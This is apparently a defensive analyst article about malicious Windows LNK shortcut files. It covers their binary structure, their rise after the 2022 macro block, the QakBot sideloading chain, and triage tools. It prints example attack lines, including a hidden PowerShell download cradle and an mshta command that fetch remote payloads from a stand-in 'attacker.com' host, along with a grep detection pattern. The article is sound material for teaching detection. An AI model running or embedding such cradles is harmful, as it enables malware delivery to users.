When Microsoft blocked internet-marked macros in 2022, attackers pivoted to LNK files. The binary structure, embedded command abuse, and the QakBot delivery chain that made LNK the dominant initial access vector of 2023.
Sign in to mark this article as read and track your progress.
In February 2022, Microsoft announced that Office would block macros from files downloaded from the internet by default. The change was enforced progressively across Microsoft 365 and Office 2021 from mid-2022 onward. Within months, the malware delivery ecosystem had pivoted. Proofpoint tracked a 66% decline in macro-based delivery and a corresponding rise in LNK, ISO, and HTML smuggling techniques between Q1 and Q4 of 2022. LNK files became the most prominent of these alternatives, used by QakBot, IcedID, Emotet (post-resurgence), and multiple nation-state actors.
The reason is straightforward: LNK files are Windows shell shortcuts. Every Windows user understands "double-click to open." A well-crafted LNK file looks like a PDF, a Word document, or an invoice. Double-clicking it executes arbitrary commands.
A LNK file is a binary format defined in [MS-SHLLINK]. The structure relevant to analysts:
ShellLinkHeader (76 bytes, fixed). Contains the magic bytes (4C 00 00 00), a CLSID, and LinkFlags that declare which optional sections follow. The HAS_ARGUMENTS flag (0x00000020) indicates embedded command-line arguments — the first thing to check.
LinkTargetIDList. The path to the target file as a series of shell item IDs. In malicious LNKs this often points to a legitimate Windows binary (cmd.exe, powershell.exe, mshta.exe, wscript.exe) to give the shortcut a plausible target.
LinkInfo. Volume and path information for the target. May be populated with a UNC path pointing to attacker infrastructure for credential harvesting via NTLM relay.
StringData. Contains the embedded command-line arguments in the COMMAND_LINE_ARGUMENTS field. This is where the payload lives in virtually all malicious LNKs.
The StringData section commonly contains one of these patterns:
PowerShell download cradle:
/c powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://attacker.com/stage2.ps1')"
LOLBin proxy execution (mshta):
mshta.exe https://attacker.com/payload.hta
DLL sideloading setup (QakBot 2023 pattern):
/c cmd /q /c start /b "" "C:\Users\Public\msedgeupdate.exe"
The LNK is bundled inside a ZIP or ISO alongside a legitimate signed binary (msedgeupdate.exe, a renamed copy of a real application) and a malicious DLL. The LNK launches the legitimate binary, which sideloads the DLL from the same directory.
The QakBot delivery chain documented extensively in 2023 campaigns followed this structure:
cmd.exe /c start "" [legitimate PE]The chain is notable for keeping the initial malicious activity entirely within a signed legitimate binary's process context until the DLL injection stage.
LnkParse3 (Python):
pip install LnkParse3
lnkparse -j suspicious.lnk
Outputs the full LNK structure as JSON. The command_line_arguments field in the output is what matters most.
lnk2json: Similar functionality, useful as a cross-check.
ExifTool: Extracts metadata from LNK files including creation timestamps, drive serial numbers, and machine SID — useful for infrastructure attribution.
Strings + grep: For triage without tooling, strings -n 8 suspicious.lnk | grep -i "powershell\|mshta\|cmd\|wscript" catches most commodity samples.
explorer.exe spawning cmd.exe or powershell.exe with hidden window flags is highly anomalous for normal user activity.